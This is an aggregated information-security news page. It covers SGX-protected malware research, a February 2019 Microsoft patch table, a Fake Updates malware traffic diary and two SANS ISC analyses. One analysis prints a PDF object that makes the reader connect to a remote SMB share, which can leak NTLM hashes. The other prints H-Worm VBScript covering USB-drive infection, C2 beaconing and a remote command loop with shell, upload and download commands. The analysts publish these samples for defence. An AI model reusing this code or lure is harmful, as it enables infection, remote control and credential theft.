Information Security News |
Intel Skylake die shot. (credit: Intel)
Researchers have found a way to run malicious code on systems with Intel processors in such a way that the malware can't be analyzed or identified by antivirus software, using the processor's own features to protect the bad code. As well as making malware in general harder to examine, bad actors could use this protection to, for example, write ransomware applications that never disclose their encryption keys in readable memory, making it substantially harder to recover from attacks.
The research, performed at Graz University of Technology by Michael Schwarz, Samuel Weiser, and Daniel GrussĀ (one of the researchers behind last year's Spectre attack), uses a feature that Intel introduced with its Skylake processors called SGX ("Software Guard eXtensions"). SGX enables programs to carve out enclaves where both the code and the data the code works with are protected to ensure their confidentiality (nothing else on the system can spy on them) and integrity (any tampering with the code or data can be detected). The contents of an enclave are transparently encrypted every time they're written to RAM and decrypted upon being read. The processor governs access to the enclave memory: any attempt to access the enclave's memory from code outside the enclave is blocked; the decryption and encryption only occurs for the code within the enclave.
SGX has been promoted as a solution to a range of security concerns when a developer wants to protect code, data, or both, from prying eyes. For example, an SGX enclave running on a cloud platform could be used to run custom proprietary algorithms, such that even the cloud provider cannot determine what the algorithms are doing. On a client computer, the SGX enclave could be used in a similar way to enforce DRM (digital rights management) restrictions; the decryption process and decryption keys that the DRM used could be held within the enclave, making them unreadable to the rest of the system. There are biometric products on the market that use SGX enclaves for processing the biometric data and securely storing it such that it can't be tampered with.
Read 15 remaining paragraphs | Comments
This month, we got patches for 74 vulnerabilities in total. One of them has been exploited and two vulnerabilities have been made public before today.
The known exploited vulnerability (CVE-2019-0676) may lead to information disclosure and affects Internet Explorer 10 on Windows Server 2012 and Internet Explorer 11 on Windows 7, 8.1 and 10 and Windows Server 2008, 2012, 2016 and 2019.
From two previously known vulnerabilities, one (CVE-2019-0636) may also lead to information disclosure and the other, CVE-2019-0686, is a privilege escalation vulnerability on Microsoft Exchange 2010, 2013, 2016 and 2019. This vulnerability was well detailed by Bojan in this diary.
Past month, critical vulnerabilities affected Microsoft DHCP Client. This time, a critical vulnerability was fixed on DHCP Server (2019-0626). If successfully exploited, it may allow an attacker to run arbitrary code on the DHCP server. The CVSS V3 for this vulnerability is 9.8 (out of 10).
Take a look at mine dashboard for a more detailed breakout: https://patchtuesdaydashboard.com
Description | |||||||
---|---|---|---|---|---|---|---|
CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
.NET Framework and Visual Studio Remote Code Execution Vulnerability | |||||||
%%cve:2019-0613%% | No | No | Less Likely | Less Likely | Important | ||
.NET Framework and Visual Studio Spoofing Vulnerability | |||||||
%%cve:2019-0657%% | No | No | Less Likely | Less Likely | Important | ||
Azure IoT Java SDK Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0729%% | No | No | - | - | Important | ||
Azure IoT Java SDK Information Disclosure Vulnerability | |||||||
%%cve:2019-0741%% | No | No | - | - | Important | ||
February 2019 Adobe Flash Security Update | |||||||
ADV190003 | No | No | - | - | Critical | ||
February 2019 Oracle Outside In Library Security Update | |||||||
ADV190004 | No | No | - | - | |||
GDI+ Remote Code Execution Vulnerability | |||||||
%%cve:2019-0662%% | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9 |
%%cve:2019-0618%% | No | No | Less Likely | Less Likely | Critical | 8.8 | 7.9 |
Guidance for "PrivExchange" Elevation of Privilege Vulnerability | |||||||
ADV190007 | Yes | No | More Likely | More Likely | |||
Guidance to mitigate unconstrained delegation vulnerabilities | |||||||
ADV190006 | No | No | - | - | |||
HID Information Disclosure Vulnerability | |||||||
%%cve:2019-0600%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0601%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
Internet Explorer Information Disclosure Vulnerability | |||||||
%%cve:2019-0676%% | No | Yes | More Likely | Detected | Important | 2.4 | 2.2 |
Internet Explorer Memory Corruption Vulnerability | |||||||
%%cve:2019-0606%% | No | No | - | - | Critical | 6.4 | 5.8 |
Jet Database Engine Remote Code Execution Vulnerability | |||||||
%%cve:2019-0625%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0595%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0596%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0597%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0598%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
%%cve:2019-0599%% | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
Latest Servicing Stack Updates | |||||||
ADV990001 | No | No | - | - | Critical | ||
Microsoft Browser Spoofing Vulnerability | |||||||
%%cve:2019-0654%% | No | No | More Likely | More Likely | Important | 2.4 | 2.2 |
Microsoft Edge Information Disclosure Vulnerability | |||||||
%%cve:2019-0643%% | No | No | - | - | Moderate | 4.3 | 3.9 |
Microsoft Edge Memory Corruption Vulnerability | |||||||
%%cve:2019-0645%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0650%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0634%% | No | No | - | - | Critical | 4.2 | 3.8 |
Microsoft Edge Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0641%% | No | No | - | - | Moderate | 4.3 | 3.9 |
Microsoft Excel Information Disclosure Vulnerability | |||||||
%%cve:2019-0669%% | No | No | More Likely | More Likely | Important | ||
Microsoft Exchange Server Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0686%% | Yes | No | More Likely | More Likely | Important | ||
%%cve:2019-0724%% | No | No | - | - | Important | ||
Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | |||||||
%%cve:2019-0671%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0672%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0673%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0674%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0675%% | No | No | - | - | Important | ||
Microsoft Office Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0540%% | No | No | More Likely | More Likely | Important | ||
Microsoft SharePoint Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0668%% | No | No | - | - | Important | ||
Microsoft SharePoint Remote Code Execution Vulnerability | |||||||
%%cve:2019-0594%% | No | No | Less Likely | Less Likely | Critical | ||
%%cve:2019-0604%% | No | No | Less Likely | Less Likely | Critical | ||
Microsoft SharePoint Spoofing Vulnerability | |||||||
%%cve:2019-0670%% | No | No | - | - | Moderate | ||
Scripting Engine Elevation of Privileged Vulnerability | |||||||
%%cve:2019-0649%% | No | No | - | - | Important | 4.2 | 3.8 |
Scripting Engine Information Disclosure Vulnerability | |||||||
%%cve:2019-0648%% | No | No | - | - | Important | 4.3 | 3.9 |
%%cve:2019-0658%% | No | No | - | - | Important | 4.3 | 3.9 |
Scripting Engine Memory Corruption Vulnerability | |||||||
%%cve:2019-0607%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0610%% | No | No | - | - | Important | 4.2 | 3.8 |
%%cve:2019-0640%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0642%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0644%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0651%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0652%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0655%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0590%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0591%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0593%% | No | No | - | - | Critical | 4.2 | 3.8 |
%%cve:2019-0605%% | No | No | - | - | Critical | 4.2 | 3.8 |
Team Foundation Server Cross-site Scripting Vulnerability | |||||||
%%cve:2019-0743%% | No | No | Less Likely | Less Likely | Important | ||
%%cve:2019-0742%% | No | No | Less Likely | Less Likely | Important | ||
Visual Studio Code Remote Code Execution Vulnerability | |||||||
%%cve:2019-0728%% | No | No | Less Likely | Less Likely | Important | ||
Win32k Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0623%% | No | No | - | - | Important | 7.0 | 6.3 |
Win32k Information Disclosure Vulnerability | |||||||
%%cve:2019-0628%% | No | No | More Likely | More Likely | Important | 4.7 | 4.2 |
Windows DHCP Server Remote Code Execution Vulnerability | |||||||
%%cve:2019-0626%% | No | No | Less Likely | Less Likely | Critical | 9.8 | 8.8 |
Windows Defender Firewall Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0637%% | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
Windows GDI Information Disclosure Vulnerability | |||||||
%%cve:2019-0660%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0664%% | No | No | - | - | Important | 4.7 | 4.2 |
%%cve:2019-0602%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0615%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0616%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
%%cve:2019-0619%% | No | No | Less Likely | Less Likely | Important | 4.7 | 4.2 |
Windows Hyper-V Information Disclosure Vulnerability | |||||||
%%cve:2019-0635%% | No | No | Less Likely | Less Likely | Important | 5.4 | 4.9 |
Windows Information Disclosure Vulnerability | |||||||
%%cve:2019-0636%% | Yes | No | More Likely | More Likely | Important | 5.5 | 5.1 |
Windows Kernel Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0656%% | No | No | - | - | Important | 4.7 | 4.2 |
Windows Kernel Information Disclosure Vulnerability | |||||||
%%cve:2019-0661%% | No | No | - | - | Important | 4.7 | 4.2 |
%%cve:2019-0621%% | No | No | More Likely | More Likely | Important | 5.5 | 5.0 |
Windows SMB Remote Code Execution Vulnerability | |||||||
%%cve:2019-0630%% | No | No | More Likely | More Likely | Important | 7.5 | 6.7 |
%%cve:2019-0633%% | No | No | More Likely | More Likely | Important | 7.5 | 6.7 |
Windows Security Feature Bypass Vulnerability | |||||||
%%cve:2019-0627%% | No | No | More Likely | More Likely | Important | 5.3 | 4.8 |
%%cve:2019-0631%% | No | No | More Likely | More Likely | Important | 5.3 | 4.8 |
%%cve:2019-0632%% | No | No | More Likely | More Likely | Important | 5.3 | 4.8 |
Windows Storage Service Elevation of Privilege Vulnerability | |||||||
%%cve:2019-0659%% | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3 |
--
Renato Marinho
Morphus Labs| LinkedIn|Twitter>
Introduction
Last week on 2019-02-06, @baberpervez2 tweeted about a compromised website used by the Fake Updates campaign (link to tweet). The Fake Updates campaign uses compromised websites that generate traffic to a fake update page. The type of fake update page depends on your web browser. Victims would see a fake Flash update page when using Internet Explorer, a fake Chrome update page when using Google Chrome, or a fake Firefox update page when using Firefox. Victims download JavaScript (.js) files from these pages disguised as browser updates. The downloaded .js files will instead install malware on a vulnerable Windows host.
Patterns for infection traffic are relatively unchanged since this campaign was first reported on the Malwarebytes blog in April 2018.
I generated an infection from the Fake Updates campaign on Friday 2019-02-09 and again on Monday 2019-02-11. Both times, the final payload was a Chthonic banking Trojan. Today's diary reviews the infection I generated on Monday 2019-02-11.
Shown above: Flow chart for infection traffic from Monday 2019-02-11.
Screenshots
The following ar screenshots on Fake Updates campaign traffic I generated from the inital compromised website at thetechhaus[.]com.
Shown above: Fake Chrome update page seen when thetechhaus[.]com was viewed in the Chrome web browser.
Shown above: You can ignore warnings, download, and run the malicious .js file on a vulnerable Windows host.
Shown above: The .js file shows highly-obfuscated script, which has always been the case for files from this campaign.
Shown above: Start of the infection chain traffic filtered in Wireshark.
Shown above: Redirect traffic to track.positiverefreshment[.]org that pointed to fake Chrome update page.
Shown above: Traffic for fake Chrome update page on 3aak.gotguardsecurity[.]com.
Shown above: HTTPS traffic to dl.dropboxusercontent.com that returned a malicious .js file.
Shown above: Traffic after running the .js file disguised as a Chrome update.
Shown above: Final payload (Chthonic banking Trojan) persistent on the infected Windows host.
Indicators of Compromise (IoCs)
The following are indicators associated with the infection on Monday 2019-02-11.
Initial compromised site:
Redirect that led to fake Chrome update page:
Traffic for fake Chrome update page:
Download of .js file disguised as Chrome update:
Traffic generated by .js file:
Post-infection traffic caused by Chthonic banking Trojan:
Associated malware:
SHA256 hash: 9daa0dec909874316afe7f402e82d408b96b215a3501579849c792ec91cfe750
SHA256 hash: 4a17789f8a03fb2ec3185322ab879d436470d931e1fb98d0a4b9e5b68cda95ab
SHA256 hash: 7356424e04f730c7440f76cd822ff8645693b9835ae6aec4d6840cb1becae45c
Final words
Monday's infection was unusual, because everything except for the dropbox URL was regular HTTP traffic. I more often find HTTPS traffic from the compromised site, redirect traffic, and fake update page. Usually the only HTTP traffic is generated by the downloaded .js file and final malware payload.
Pcap and malware samples for today's diary can be found here.
---
Brad Duncan
brad [at] malware-traffic-analysis.net
Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer's anti-malware solution and placed in the quarantine. Later, the recipient contacted the team in charge of emails to access his document because he knew the sender and pretended that the file was legit.
The file looked indeed safe and the content was properly related to the customer's business. I did a quick analysis of the file in my sanbox and, once the file opened, Acrobat Reader attempted to connect to a remote SMB share. I extracted objects from the PDF file and there was indeed a reference to a SMB share. When you ask a computer to connect to such a service, you immediately think about NTLM hashes leak.
Here is the object extracted from the PDF:
obj 10 0 Type: /Page Referencing: 9 0 R, 6 0 R, 11 0 R, 12 0 R, 13 0 R, 7 0 R, 2 0 R, 14 0 R, 1 0 R, 15 0 R, 16 0 R, 17 0 R, 18 0 R, 3 0 R, 19 0 R, 20 0 R << /AA << /O << /F '(\\\\\\\\virtualofficestorage[.]com\\\\docs_share)' /D [ 0 /Fit] /S /GoToE >> >> /Parent 9 0 R /Contents [6 0 R 11 0 R 12 0 R 13 0 R 7 0 R] /Type /Page /Resources << /ExtGState << /Xi1 2 0 R >> /XObject << /BG0 14 0 R /Xi0 1 0 R /CL 15 0 R >> /ProcSet [/PDF /Text /ImageB /ImageC /ImageI] /Font << /F_2 16 0 R /F_0 17 0 R /F_1 18 0 R /Xi2 3 0 R >> >> /MediaBox [0 -0.02000 598.80 844.08] /Annots [19 0 R 20 0 R] >>
The domain virtualofficestorage[.]com[1] resolves to %%ip:185.225.17.98%%, located in Romania. Shodan reports indeed a SMB share:
Helas, it does not reply anymore (last seen on 2019-02-03). There is a website running on this domain, it serves the default Ubuntu Apache welcome page.
I can't share the file not the hash but did you notice the same behavious with other PDF documents? Do you know more about this domain? (VT has only one reference to the same kind of document[2])
Please share!
[1] https://www.virustotal.com/#/domain/virtualofficestorage.com
[2] https://www.virustotal.com/#/file/746794ca49f497b43eb53a2fb25c4a0b3782002a45f498c047fa07d46cd43592/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is useless… Event sites from the Alexa Top-1M may deliver malicious content (Github current position is 51[1]). The URL has been found in a classic email phishing attempt. The content was recently uploaded (<24h) when I found it:
hxxps://raw.githubusercontent[.]com/sidilig/sharing/ebk-ci/Ebanking.zip
Let’s have a look at the archive content:
ISC $ shasum -a 256 Ebanking.zip abb244010410ce6012bac9e4fc902432cfebe06724d014c63d9ef21f0a6b8b78 Ebanking.zip ISC $ unzip -t Ebanking.zip Archive: Ebanking.zip testing: Mesures de sécurité.jar OK testing: Habilitations Ebank.vbs OK No errors detected in compressed data of Ebanking.zip. ISC $ shasum -a 256 * d4ffa2acdec66f15c2252f36311c059ab00cc942b7cb54c33b4257dbc680ed9b Habilitations Ebank.vbs 7ab54cb93a4a76dd5578f0b0ddcaeb8420311ebb39f27b62e535a43aec02523a Mesures de sécurité.jar
Let’s have a look at the VBScript code. It’s based on a big class:
Class Values ... End Class Set myClass = new Values myClass.Start()
Most part of the code is obfuscated using a simple technique: A chunk of Base64 data is decoded by replacing a set of characters with the letter ‘A’:
Private Function peter_paul(sand, way_off) Dim stapler, hp_pc, pillow, ruben stapler = "[email protected]" hp_pc = "A" pillow = "Q29uc3QgVHlw....." ruben = Replace(pillow, stapler, hp_pc) peter_paul = b642byt_arr(1, ruben, 10) End Function
Easy to decode with Cyberchef:
The decoded data is a new script. The next step is to execute it::
Public Sub Start() Set yhm_pepe = CreateObject("ADODB.Stream") Set spike = CreateObject("Microsoft.XMLDOM") If john_conor(1, peter_paul(0, False)) = ojor Then ExecuteGlobal ojor End If End Sub
The code is simply written to the ADODB.Stream then executed. Here is what the second stage does. It copies itself for persistence in %TEMP%\tGcuACWROu.vbs then install . An interesting behaviour: it scans for available removable drives (drive.type == 1)[2] and infect them:
for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true if filesystemobj.fileexists (drive.path & "\" & installname) then filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4 end if for each file in filesystemobj.getfolder( drive.path & "\" ).Files if not lnkfile then exit for if instr (file.name,".") then if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 2+4 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") set lnkobj = shellobj.createshortcut (drive.path & "\"&filename (0)&".lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" filleicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") if instr (fileicon,",") = 0 then lnkobj.iconlocation = file.path else lnkobj.iconlocation = fileicon end if lnkobj.save() end if end if end if next
When the installation is successful, it starts to communicate with the C2 server: hxxp://ghanaandco.sytes[.]net:3007.
POST /is-ready HTTP/1.1 Accept: */* Accept-Language: fr-be User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019 Accept-Encoding: gzip, deflate Host: ghanaandco.sytes.net:3007 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Here is a reply from the C2 server:
HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 sleep<|>5000
Here is the main loop waiting for commands:
while true install response = "" response = post ("is-ready","") cmd = split (response,spliter) select case cmd (0) case "excecute" param = cmd (1) execute param case "update" param = cmd (1) oneonce.close set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false) oneonce.write param oneonce.close shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) wscript.quit case "uninstall" uninstall case "send" download cmd (1),cmd (2) case "site-send" sitedownloader cmd (1),cmd (2) case "recv" param = cmd (1) upload (param) case "enum-driver" post "is-enum-driver",enumdriver case "enum-faf" param = cmd (1) post "is-enum-faf",enumfaf (param) case "enum-process" post "is-enum-process",enumprocess case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param) case "delete" param = cmd (1) deletefaf (param) case "exit-process" param = cmd (1) exitprocess (param) case "sleep" param = cmd (1) sleep = eval (param) end select wscript.sleep sleep wend
If the delivery method changed, the malicious code is not new. This is a good old H-Worm as already found in 2013[3]. Old stuff but still used in the wild!
[1] https://www.alexa.com/siteinfo/github.com
[2] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/drivetype-property
[3] https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Posted by InfoSec News on Feb 12
http://www.thedrive.com/the-war-zone/26458/the-u-s-armys-new-up-gunned-stryker-armored-vehicles-have-been-hackedPosted by InfoSec News on Feb 12
Forwarded from: vvandal[at]well[dot]comPosted by InfoSec News on Feb 12
https://www.zdnet.com/article/russia-to-disconnect-from-the-internet-as-part-of-a-planned-test/Posted by InfoSec News on Feb 12
https://www.cnn.com/2019/02/08/politics/cia-fbi-scammer-william-webster/index.htmlPosted by InfoSec News on Feb 12
https://www.csoonline.com/article/3075293/leadership-management/cybersecurity-recruitment-in-crisis.html